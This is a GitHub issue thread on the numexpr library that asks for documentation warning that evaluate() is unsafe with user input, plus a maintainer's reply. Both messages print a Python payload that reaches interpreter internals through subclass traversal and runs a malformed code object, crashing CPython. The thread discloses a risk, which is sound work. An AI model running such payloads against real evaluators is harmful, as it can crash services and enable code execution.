### ISSUE TITLE
Document that it's not safe to use evaluate with user inputs

### ISSUE THREAD

**Issue by Dobatymo** [pydata/numexpr#323]
This crashes CPython (v3.6.6)

```
import numexpr

s = """
(lambda fc=(
    lambda n: [
        c for c in 
            ().__class__.__bases__[0].__subclasses__() 
            if c.__name__ == n
        ][0]
    ):
    fc("function")(
        fc("code")(0,0,0,0,0,b"a",(),(),(),"","",0,b""),{}
    )()
)()
"""
numexpr.evaluate(s)

```

see: https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html

**Comment by robbmcleod** [comment]
We don't call `eval`, we call `compile`.  Your code fragment:

    (lambda fc=(
        lambda n: [
            c for c in 
                ().__class__.__bases__[0].__subclasses__() 
                if c.__name__ == n
            ][0]
        ):
        fc("function")(
            fc("code")(0,0,0,0,0,b"a",(),(),(),"","",0,b""),{}
        )()
    )()

crashes CPython, so probably you should report it as an upstream bug with CPython's `compile` function.
